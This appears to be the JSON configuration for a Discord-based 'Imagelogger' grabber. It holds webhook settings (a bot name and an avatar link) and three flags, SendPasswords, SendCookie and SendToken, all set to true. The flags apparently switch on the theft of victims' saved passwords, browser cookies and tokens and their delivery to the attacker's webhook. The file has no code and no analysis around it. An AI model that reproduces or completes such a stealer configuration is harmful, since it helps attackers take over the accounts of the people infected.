{
    "Title_Configs":[
        {

           "name": "Xeno",
           "servername": "Imagelog",
           "program": "Your_Program_Name"

        }
    ],

    "Webhook_config":[
        {

          "Bot_Name": "Imagelogger",
          "Bot_Avatar": "https://media.discordapp.net/attachments/818904459681071126/1008774401648505013/goat6.jpg"
  
        }
    ],

    "Other_Configs":[
        {
          "SendPasswords": true,
          "SendCookie": true,
          "SendToken": true
        }
    ]


}
